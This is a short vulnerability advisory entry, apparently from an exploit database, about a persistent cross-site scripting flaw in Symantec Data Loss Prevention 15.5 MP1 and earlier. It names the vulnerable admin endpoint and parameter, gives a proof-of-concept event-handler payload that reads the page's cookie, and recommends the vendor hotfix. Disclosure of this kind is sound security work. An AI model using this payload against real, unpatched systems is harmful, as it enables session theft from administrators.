vendor:
Data Loss Prevention
by:
Chapman Schleiss
8.8
CVSS
HIGH
Persistent XSS
79
CWE
Product Name: Data Loss Prevention
Affected Version From: <= 15.5 MP1
Affected Version To: <= 15.5 MP1
Patch Exists: YES
Related CWE: 2019-9701
CPE: a:symantec:data_loss_prevention:15.5
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: Windows, Linux, Mac
2019
Persistent XSS on Symantec DLP <= 15.5 MP1
Persistent XSS via 'name' param at /ProtectManager/enforce/admin/senderrecipientpatterns/list. Payload: ' oNmouseover=prompt(document.domain,document.cookie) ) Browser: Firefox 64, IE 11 Date Observed: 15 January 2019
Mitigation:
Apply the hotfix provided by Symantec